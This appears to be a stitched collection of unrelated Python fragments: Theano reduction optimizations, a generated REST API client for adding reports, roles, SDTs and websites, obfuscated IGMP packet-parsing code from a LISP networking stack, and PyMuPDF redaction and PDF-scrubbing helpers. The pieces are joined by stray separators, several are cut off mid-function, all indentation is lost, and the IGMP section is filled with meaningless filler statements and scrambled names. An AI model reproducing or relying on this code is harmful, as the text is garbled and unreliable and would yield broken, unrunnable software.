node_input = node.inputs[0]
if node_input.owner and node_input.owner.op == T.true_div:
numerator, denominator = node_input.owner.inputs
# Old, bugged logic, reproduced here only to warn users
if (config.warn.sum_div_dimshuffle_bug and
isinstance(node.op, T.Sum) and
numerator.owner and
isinstance(numerator.owner.op, T.DimShuffle)):
# Check compatibility
new_order = numerator.owner.op.new_order
compatible_dims = True
for ax in axis:
if len(new_order) <= ax or new_order[ax] != 'x':
compatible_dims = False
break
if compatible_dims:
_logger.warn('WARNING: Your current code is fine, but'
' Theano versions between '
'rev. 3bd9b789f5e8 (2010-06-16) and'
' cfc6322e5ad4 (2010-08-03) would '
'have given an incorrect result. '
'To disable this warning, set the Theano'
' flag warn.sum_div_dimshuffle_bug to'
' False.')
if denominator.owner and isinstance(denominator.owner.op,
T.DimShuffle):
dimshuffle_input = denominator.owner.inputs[0]
dimshuffle_order = denominator.owner.op.new_order
compatible_dims = []
incompatible_dims = []
for ax in axis:
if (ax < len(dimshuffle_order) and
dimshuffle_order[ax] == 'x'):
compatible_dims.append(ax)
else:
incompatible_dims.append(ax)
reordered_incompatible_dims = []
for ic_ax in incompatible_dims:
reordered_incompatible_dims.append(
ic_ax - sum(
[1 for c_ax in compatible_dims if c_ax < ic_ax]))
if len(compatible_dims) > 0:
optimized_dimshuffle_order = list(
ax for i, ax in enumerate(dimshuffle_order)
if (i not in axis) or (ax != 'x'))
# Removing leading 'x' (since it will be done automatically)
while (len(optimized_dimshuffle_order) > 0 and
optimized_dimshuffle_order[0] == 'x'):
del optimized_dimshuffle_order[0]
# if optimized_dimshuffle_order is sorted with
# not 'x', then dimshuffle is useless.
if all(i == e for i, e in
enumerate(optimized_dimshuffle_order)):
optimized_dimshuffle = dimshuffle_input
else:
optimized_dimshuffle = T.DimShuffle(
dimshuffle_input.type.broadcastable,
optimized_dimshuffle_order)(dimshuffle_input)
if (config.warn.sum_div_dimshuffle_bug and
isinstance(node.op, T.Sum)):
_logger.warn('WARNING: Your current code is fine,'
' but Theano versions between '
'rev. 3bd9b789f5e8 (2010-06-16) and'
' cfc6322e5ad4 (2010-08-03) would '
'have given an incorrect result. '
'To disable this warning, set the'
' Theano flag '
'warn.sum_div_dimshuffle_bug'
' to False.')
if isinstance(node.op, T.Sum):
op_on_compatible_dims = T.sum(
numerator, axis=compatible_dims)
rval = T.true_div(
op_on_compatible_dims,
optimized_dimshuffle)
if len(reordered_incompatible_dims) > 0:
rval = T.sum(rval,
axis=reordered_incompatible_dims)
elif isinstance(node.op, T.elemwise.Prod):
op_on_compatible_dims = T.prod(
numerator, axis=compatible_dims)
dtype = numerator.dtype
rval = T.true_div(
op_on_compatible_dims,
(optimized_dimshuffle **
T.prod([numerator.shape[ax].astype(dtype)
for ax in compatible_dims])))
if len(reordered_incompatible_dims) > 0:
rval = T.prod(rval,
axis=reordered_incompatible_dims)
return [rval]
@register_canonicalize
@gof.local_optimizer([T.Sum, T.elemwise.Prod])
def local_sum_prod_all_to_none(node):
"""
Sum{0,1,...N} -> Sum{} or
Prod{0,1,...N} -> Prod{}
"""
if isinstance(node.op, T.Sum) or isinstance(node.op, T.elemwise.Prod):
opt_type = T.Sum if isinstance(node.op, T.Sum) else T.elemwise.Prod
# if all the axes are named, then use None as a shorthand
# this permits more merging
if node.op.axis is None:
return
if set(node.op.axis) == set(range(node.inputs[0].type.ndim)):
return [opt_type(axis=None, dtype=node.op.dtype)(node.inputs[0])]
@register_canonicalize
@gof.local_optimizer([T.Sum, T.elemwise.Prod])
def local_op_of_op(node):
"""
Prod(Prod()) -> single Prod()
or
Sum(Sum()) -> single Sum()
"""
if isinstance(node.op, T.elemwise.Prod) or isinstance(node.op, T.Sum):
opt_type = T.Sum if isinstance(node.op, T.Sum) else T.elemwise.Prod
node_inps, = node.inputs
out_dtype = node.op.dtype
# We manipulate the graph so this is done to make sure the opt
# doesn't affect other computations.
if len(node_inps.clients) == 1:
if (node_inps.owner and
(isinstance(node_inps.owner.op, node.op.__class__))):
# check to see either the inner or outer prod is doing a
# product over all axis, in which case we can remove it
if node_inps.owner.op.axis is None or node.op.axis is None:
return [opt_type(None, dtype=out_dtype)(
node_inps.owner.inputs[0])]
# figure out which axes were in the original sum
newaxis = list(tuple(node_inps.owner.op.axis))
for i in node.op.axis:
new_i = i
for ii in node_inps.owner.op.axis:
if new_i >= ii:
new_i += 1
assert new_i not in newaxis
newaxis.append(new_i)
assert len(newaxis) == len(list(node_inps.owner.op.axis) +
list(node.op.axis))
# The old bugged logic. We keep it there to generate a warning
# when we generated bad code.
alldims = list(range(node_inps.owner.inputs[0].type.ndim))
alldims = [d for i, d in enumerate(alldims) if i
in node_inps.owner.op.axis]
alldims = [d for i, d in enumerate(alldims)
if i in node.op.axis]
newaxis_old = [i for i in
xrange(node_inps.owner.inputs[0].type.ndim)
if i not in alldims]
if (theano.config.warn.sum_sum_bug and
newaxis != newaxis_old and
len(newaxis) == len(newaxis_old)):
_logger.warn(
"WARNING (YOUR CURRENT CODE IS FINE): Theano "
"versions between version 9923a40c7b7a and August "
"2nd, 2010 generated bugged code in this case. "
"This happens when there are two consecutive sums "
"in the graph and the intermediate sum | |
# noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/report/reports', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReportBase', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_report_group(self, body, **kwargs): # noqa: E501
"""add report group # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_report_group(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReportGroup body: (required)
:return: ReportGroup
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_report_group_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_report_group_with_http_info(body, **kwargs) # noqa: E501
return data
def add_report_group_with_http_info(self, body, **kwargs): # noqa: E501
"""add report group # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_report_group_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReportGroup body: (required)
:return: ReportGroup
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_report_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_report_group`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/report/groups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReportGroup', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_role(self, body, **kwargs): # noqa: E501
"""add role # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_role(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Role body: (required)
:return: Role
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_role_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_role_with_http_info(body, **kwargs) # noqa: E501
return data
def add_role_with_http_info(self, body, **kwargs): # noqa: E501
"""add role # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_role_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Role body: (required)
:return: Role
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_role" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_role`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/setting/roles', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Role', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_sdt(self, body, **kwargs): # noqa: E501
"""add SDT # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_sdt(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SDT body: (required)
:return: SDT
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_sdt_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_sdt_with_http_info(body, **kwargs) # noqa: E501
return data
def add_sdt_with_http_info(self, body, **kwargs): # noqa: E501
"""add SDT # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_sdt_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SDT body: (required)
:return: SDT
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_sdt" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_sdt`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/sdt/sdts', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SDT', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_website(self, body, **kwargs): # noqa: E501
"""add website # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_website(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Website body: (required)
:return: Website
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_website_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_website_with_http_info(body, **kwargs) # noqa: E501
return data
def add_website_with_http_info(self, body, **kwargs): # noqa: E501
"""add website # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_website_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Website body: (required)
:return: Website
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_website" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_website`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/website/websites', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Website', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_website_group(self, body, **kwargs): # noqa: E501
"""add website group # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, | |
OOooOOo
oO0oO0OO0oOO = ( O0ooOO in ( 0x12 , 0x16 , 0x17 , 0x22 ) )
if ( oO0oO0OO0oOO == False ) :
ooI1Iii = "{} ({})" . format ( O0ooOO , igmp_types [ O0ooOO ] ) if igmp_types . has_key ( O0ooOO ) else O0ooOO
if 32 - 32: oO0o
lprint ( "IGMP type {} not supported" . format ( ooI1Iii ) )
return ( [ ] )
if 52 - 52: oO0o
if 64 - 64: I1Ii111 + Oo0Ooo / iII111i
if ( len ( Ii11IIiii ) < 8 ) :
lprint ( "IGMP message too small" )
return ( [ ] )
if 61 - 61: Ii1I * Ii1I . OoOoOO00 + OoO0O00 * i11iIiiIii * OoO0O00
if 4 - 4: OoooooooOO % iII111i % Oo0Ooo * IiII % o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 66 - 66: I1IiiI . Oo0Ooo - oO0o
if 53 - 53: oO0o / Ii1I + oO0o + II111iiii
if 70 - 70: OoooooooOO - I1Ii111 + OoOoOO00
if ( O0ooOO == 0x17 ) :
lprint ( "IGMPv2 leave (*, {})" . format ( bold ( iI1i1iIi1iiII , False ) ) )
return ( [ [ None , iI1i1iIi1iiII , False ] ] )
if 61 - 61: I1IiiI * I1Ii111 * i11iIiiIii
if ( O0ooOO in ( 0x12 , 0x16 ) ) :
lprint ( "IGMPv{} join (*, {})" . format ( 1 if ( O0ooOO == 0x12 ) else 2 , bold ( iI1i1iIi1iiII , False ) ) )
if 68 - 68: OoOoOO00 - iII111i - I1IiiI
if 37 - 37: iII111i - I1Ii111 + i1IIi / o0oOOo0O0Ooo % iII111i / iII111i
if 8 - 8: i1IIi % I11i
if 12 - 12: ooOoO0o / II111iiii + ooOoO0o * I1ii11iIi11i / i1IIi - iIii1I11I1II1
if 71 - 71: IiII - i11iIiiIii
if ( iI1i1iIi1iiII . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
else :
return ( [ [ None , iI1i1iIi1iiII , True ] ] )
if 3 - 3: i11iIiiIii - o0oOOo0O0Ooo / oO0o . OoO0O00 * I11i + o0oOOo0O0Ooo
if 18 - 18: OoooooooOO % oO0o / IiII - ooOoO0o
if 80 - 80: I11i
if 98 - 98: iII111i / I1ii11iIi11i
if 87 - 87: iII111i - O0 * ooOoO0o / II111iiii % OoooooooOO . o0oOOo0O0Ooo
return ( [ ] )
if 55 - 55: OOooOOo - o0oOOo0O0Ooo * I1IiiI / o0oOOo0O0Ooo + I1Ii111 + iIii1I11I1II1
if 3 - 3: II111iiii % iII111i / IiII * ooOoO0o . OoooooooOO
if 56 - 56: IiII * II111iiii + Oo0Ooo - O0 - OoO0O00 . I1Ii111
if 53 - 53: i1IIi + IiII
if 90 - 90: II111iiii / oO0o / oO0o . OoOoOO00 / OoO0O00 / iIii1I11I1II1
o0oo0OoOo000 = O0o00oOOOO00 . address
Ii11IIiii = Ii11IIiii [ 8 : : ]
if 96 - 96: iIii1I11I1II1 % I1ii11iIi11i
Ii1ii111 = "BBHI"
Oo0OOoI1ii1i = struct . calcsize ( Ii1ii111 )
Iii111 = "I"
o0ooO0OOOoO0o = struct . calcsize ( Iii111 )
oo00Oo0 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 61 - 61: I1IiiI % i1IIi
if 44 - 44: Ii1I * OoOoOO00 / Ii1I * I1IiiI - OOooOOo
if 36 - 36: OOooOOo
if 93 - 93: I11i . iIii1I11I1II1 + iIii1I11I1II1
ooo00Oo0 = [ ]
for IiIIi1IiiIiI in range ( o0oo0OoOo000 ) :
if ( len ( Ii11IIiii ) < Oo0OOoI1ii1i ) : return
I1III1Ii1III , O0o000 , O0o0oooO , ii1i1II11II1i = struct . unpack ( Ii1ii111 ,
Ii11IIiii [ : Oo0OOoI1ii1i ] )
if 3 - 3: I1ii11iIi11i + I1ii11iIi11i
Ii11IIiii = Ii11IIiii [ Oo0OOoI1ii1i : : ]
if 73 - 73: OoooooooOO
if ( lisp_igmp_record_types . has_key ( I1III1Ii1III ) == False ) :
lprint ( "Invalid record type {}" . format ( I1III1Ii1III ) )
continue
if 2 - 2: o0oOOo0O0Ooo % IiII + I1ii11iIi11i - i11iIiiIii
if 100 - 100: II111iiii + oO0o
oOoO0OoOOO = lisp_igmp_record_types [ I1III1Ii1III ]
O0o0oooO = socket . ntohs ( O0o0oooO )
O0o00oOOOO00 . address = socket . ntohl ( ii1i1II11II1i )
iI1i1iIi1iiII = O0o00oOOOO00 . print_address_no_iid ( )
if 16 - 16: Ii1I
lprint ( "Record type: {}, group: {}, source-count: {}" . format ( oOoO0OoOOO , iI1i1iIi1iiII , O0o0oooO ) )
if 67 - 67: I1ii11iIi11i . OoooooooOO * I1Ii111 + Ii1I * OOooOOo
if 84 - 84: OOooOOo
if 78 - 78: O0 % O0
if 72 - 72: o0oOOo0O0Ooo * IiII / II111iiii / iIii1I11I1II1
if 41 - 41: iII111i / Ii1I
if 11 - 11: Oo0Ooo % OOooOOo . ooOoO0o
if 24 - 24: IiII / Oo0Ooo
o0OOO0oo00oO = False
if ( I1III1Ii1III in ( 1 , 5 ) ) : o0OOO0oo00oO = True
if ( I1III1Ii1III in ( 2 , 4 ) and O0o0oooO == 0 ) : o0OOO0oo00oO = True
I1iiI1I = "join" if ( o0OOO0oo00oO ) else "leave"
if 54 - 54: OOooOOo - ooOoO0o - iIii1I11I1II1
if 29 - 29: ooOoO0o
if 31 - 31: o0oOOo0O0Ooo / IiII - oO0o / OoOoOO00 * IiII * i1IIi
if 45 - 45: OoOoOO00 + iII111i % iIii1I11I1II1 - IiII * OOooOOo
if ( iI1i1iIi1iiII . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
continue
if 62 - 62: Ii1I / Oo0Ooo / I1ii11iIi11i . OoOoOO00 % ooOoO0o * IiII
if 97 - 97: ooOoO0o
if 14 - 14: iII111i + iII111i
if 62 - 62: ooOoO0o / OOooOOo * I1ii11iIi11i + Oo0Ooo - OoooooooOO - OoooooooOO
if 19 - 19: Ii1I . oO0o
if 26 - 26: OOooOOo + II111iiii
if 67 - 67: IiII + OoOoOO00 * I1ii11iIi11i % o0oOOo0O0Ooo / oO0o
if 31 - 31: ooOoO0o / Ii1I . Ii1I - I1IiiI - Oo0Ooo . II111iiii
if ( O0o0oooO == 0 ) :
ooo00Oo0 . append ( [ None , iI1i1iIi1iiII , o0OOO0oo00oO ] )
lprint ( "IGMPv3 {} (*, {})" . format ( bold ( I1iiI1I , False ) ,
bold ( iI1i1iIi1iiII , False ) ) )
if 82 - 82: Oo0Ooo % Oo0Ooo
if 17 - 17: OOooOOo % Oo0Ooo . I1IiiI * O0 * oO0o % OoOoOO00
if 99 - 99: Oo0Ooo - ooOoO0o . OoO0O00 - Oo0Ooo / O0
if 42 - 42: Ii1I - OoOoOO00 . OoOoOO00
if 88 - 88: o0oOOo0O0Ooo . Ii1I . iII111i * iII111i + i11iIiiIii
for oOoOoO0O in range ( O0o0oooO ) :
if ( len ( Ii11IIiii ) < o0ooO0OOOoO0o ) : return
ii1i1II11II1i = struct . unpack ( Iii111 , Ii11IIiii [ : o0ooO0OOOoO0o ] ) [ 0 ]
oo00Oo0 . address = socket . ntohl ( ii1i1II11II1i )
oo0iii = oo00Oo0 . print_address_no_iid ( )
ooo00Oo0 . append ( [ oo0iii , iI1i1iIi1iiII , o0OOO0oo00oO ] )
lprint ( "{} ({}, {})" . format ( I1iiI1I ,
green ( oo0iii , False ) , bold ( iI1i1iIi1iiII , False ) ) )
Ii11IIiii = Ii11IIiii [ o0ooO0OOOoO0o : : ]
if 68 - 68: Ii1I % Oo0Ooo + I1ii11iIi11i + I1ii11iIi11i + oO0o % Oo0Ooo
if 22 - 22: OoO0O00
if 40 - 40: I1ii11iIi11i * I1Ii111
if 6 - 6: i11iIiiIii . o0oOOo0O0Ooo * iIii1I11I1II1 . OoOoOO00 . II111iiii
if 67 - 67: OoO0O00 - Oo0Ooo + OOooOOo / OoOoOO00 + OOooOOo
if 18 - 18: Oo0Ooo % OoOoOO00 % i1IIi
if 66 - 66: OoOoOO00 % II111iiii
if 16 - 16: i11iIiiIii - I1IiiI + ooOoO0o * oO0o
return ( ooo00Oo0 )
if 30 - 30: II111iiii / o0oOOo0O0Ooo
if 57 - 57: I11i / I1ii11iIi11i . I11i
if 68 - 68: OoOoOO00 + O0 . I1IiiI
if 26 - 26: I1ii11iIi11i
if 98 - 98: Oo0Ooo
if 72 - 72: oO0o | |
Must be one of the CJK or Base-14 set, else
the rectangle is returned unchanged.
fsize: the fontsize
Returns:
A rectangle to use instead of the annot rectangle.
"""
if not text:
return annot_rect
try:
text_width = getTextlength(text, font, fsize)
except ValueError: # unsupported font
return annot_rect
line_height = fsize * 1.2
limit = annot_rect.width
h = math.ceil(text_width / limit) * line_height # estimate rect height
if h >= annot_rect.height:
return annot_rect
r = annot_rect
y = (annot_rect.tl.y + annot_rect.bl.y - h) * 0.5
r.y0 = y
return r
CheckParent(page)
doc = page.parent
if doc.isEncrypted or doc.isClosed:
raise ValueError("document closed or encrypted")
if not doc.isPDF:
raise ValueError("not a PDF")
redact_annots = [] # storage of annot values
for annot in page.annots(types=(PDF_ANNOT_REDACT,)): # loop redactions
redact_annots.append(annot._get_redact_values()) # save annot values
if redact_annots == []: # any redactions on this page?
return False # no redactions
rc = page._apply_redactions(images) # call MuPDF redaction process step
if not rc: # should not happen really
raise ValueError("Error applying redactions.")
# now write replacement text in old redact rectangles
shape = page.newShape()
for redact in redact_annots:
annot_rect = redact["rect"]
fill = redact["fill"]
if fill:
shape.drawRect(annot_rect) # colorize the rect background
shape.finish(fill=fill, color=fill)
if "text" in redact.keys(): # if we also have text
trect = center_rect( # try finding vertical centered sub-rect
annot_rect, redact["text"], redact["fontname"], redact["fontsize"]
)
fsize = redact["fontsize"] # start with stored fontsize
rc = -1
while rc < 0 and fsize >= 4: # while not enough room
rc = shape.insertTextbox( # (re-) try insertion
trect,
redact["text"],
fontname=redact["fontname"],
fontsize=fsize,
color=redact["text_color"],
align=redact["align"],
)
fsize -= 0.5 # reduce font if unsuccessful
shape.commit() # append new contents object
return True
# ------------------------------------------------------------------------------
# Remove potentially sensitive data from a PDF. Corresponds to the Adobe
# Acrobat 'sanitize' function
# ------------------------------------------------------------------------------
def scrub(
doc: Document,
attached_files: bool = True,
clean_pages: bool = True,
embedded_files: bool = True,
hidden_text: bool = True,
javascript: bool = True,
metadata: bool = True,
redactions: bool = True,
redact_images: int = 0,
remove_links: bool = True,
reset_fields: bool = True,
reset_responses: bool = True,
xml_metadata: bool = True,
) -> None:
def remove_hidden(cont_lines):
"""Remove hidden text from a PDF page.
Args:
cont_lines: list of lines with /Contents content. Should have status
from after page.cleanContents().
Returns:
List of /Contents lines from which hidden text has been removed.
Notes:
The input must have been created after the page's /Contents object(s)
have been cleaned with page.cleanContents(). This ensures a standard
formatting: one command per line, single spaces between operators.
This allows for drastic simplification of this code.
"""
out_lines = [] # will return this
in_text = False # indicate if within BT/ET object
suppress = False # indicate text suppression active
make_return = False
for line in cont_lines:
if line == b"BT": # start of text object
in_text = True # switch on
out_lines.append(line) # output it
continue
if line == b"ET": # end of text object
in_text = False # switch off
out_lines.append(line) # output it
continue
if line == b"3 Tr": # text suppression operator
suppress = True # switch on
make_return = True
continue
if line[-2:] == b"Tr" and line[0] != b"3":
suppress = False # text rendering changed
out_lines.append(line)
continue
if line == b"Q": # unstack command also switches off
suppress = False
out_lines.append(line)
continue
if suppress and in_text: # suppress hidden lines
continue
out_lines.append(line)
if make_return:
return out_lines
else:
return None
if not doc.isPDF: # only works for PDF
raise ValueError("not a PDF")
if doc.isEncrypted or doc.isClosed:
raise ValueError("closed or encrypted doc")
if clean_pages is False:
hidden_text = False
redactions = False
if metadata:
doc.setMetadata({}) # remove standard metadata
for page in doc:
if reset_fields:
# reset form fields (widgets)
for widget in page.widgets():
widget.reset()
widget.update()
if remove_links:
links = page.getLinks() # list of all links on page
for link in links: # remove all links
page.deleteLink(link)
found_redacts = False
for annot in page.annots():
if annot.type[0] == PDF_ANNOT_FILE_ATTACHMENT and attached_files:
annot.fileUpd(buffer=b" ") # set file content to empty
if reset_responses:
annot.delete_responses()
if annot.type[0] == PDF_ANNOT_REDACT:
found_redacts = True
if redactions and found_redacts:
page.apply_redactions(images=redact_images)
if not (clean_pages or hidden_text):
continue # done with the page
page.clean_contents()
if not page.get_contents():
continue
if hidden_text:
xref = page.get_contents()[0] # only one b/o cleaning!
cont = doc.xref_stream(xref)
cont_lines = remove_hidden(cont.splitlines()) # remove hidden text
if cont_lines: # something was actually removed
cont = b"\n".join(cont_lines)
doc.update_stream(xref, cont) # rewrite the page /Contents
# pages are scrubbed, now perform document-wide scrubbing
# remove embedded files
if embedded_files:
for name in doc.embeddedFileNames():
doc.embeddedFileDel(name)
if xml_metadata:
doc.del_xml_metadata()
if not (xml_metadata or javascript):
xref_limit = 0
else:
xref_limit = doc.xrefLength()
for xref in range(1, xref_limit):
obj = doc.xref_object(xref) # get object definition source
# note: this string is formatted in a standard way by MuPDF.
if javascript and "/S /JavaScript" in obj: # a /JavaScript action object?
obj = "<</S/JavaScript/JS()>>" # replace with a null JavaScript
doc.update_object(xref, obj) # update this object
continue # no further handling
if not xml_metadata or "/Metadata" not in obj:
continue
if "/Type /Metadata" in obj: # delete any metadata object directly
doc.update_stream(xref, b"deleted")
doc.update_object(xref, "<<>>")
continue
obj_lines = obj.splitlines()
new_lines = [] # will receive remaining obj definition lines
found = False # assume /Metadata not found
for line in obj_lines:
line = line.strip()
if not line.startswith("/Metadata "):
new_lines.append(line) # keep this line
else: # drop this line
found = True
if found: # if removed /Metadata key, update object definition
doc.updateObject(xref, "\n".join(new_lines))
def fillTextbox(
writer: TextWriter,
rect: rect_like,
text: typing.Union[str, list],
pos: point_like = None,
font: typing.Optional[Font] = None,
fontsize: float = 11,
lineheight: OptFloat = None,
align: int = 0,
warn: bool = True,
) -> tuple:
"""Fill a rectangle with text.
Args:
writer: TextWriter object (= "self")
text: string or list/tuple of strings.
rect: rect-like to receive the text.
pos: point-like start position of first word.
font: Font object (default Font('helv')).
fontsize: the fontsize.
lineheight: overwrite the font property
align: (int) 0 = left, 1 = center, 2 = right, 3 = justify
warn: (bool) just warn on text overflow, else raise exception.
"""
textlen = lambda x: font.text_length(x, fontsize) # just for abbreviation
rect = Rect(rect)
if rect.isEmpty or rect.isInfinite:
raise ValueError("fill rect must be finite and not empty.")
if type(font) is not Font:
font = Font("helv")
asc = font.ascender
dsc = font.descender
if not lineheight:
if asc - dsc <= 1:
lheight = 1.2
else:
lheight = asc - dsc
else:
lheight = lineheight
tolerance = fontsize * 0.25
width = rect.width - tolerance # available horizontal space
len_space = textlen(" ") # width of space character
# starting point of the text
if pos is not None:
pos = Point(pos)
if not pos in rect:
raise ValueError("'pos' must be inside 'rect'")
else: # default is just below rect top-left
pos = rect.tl + (tolerance, fontsize * asc)
# calculate displacement factor for alignment
if align == TEXT_ALIGN_CENTER:
factor = 0.5
elif align == TEXT_ALIGN_RIGHT:
factor = 1.0
else:
factor = 0
# split in lines if just a string was given
if type(text) not in (tuple, list):
text = text.splitlines()
text = " \n".join(text).split(" ") # split in words, preserve line breaks
# compute lists of words and word lengths
words = [] # recomputed list of words
len_words = [] # corresponding lengths
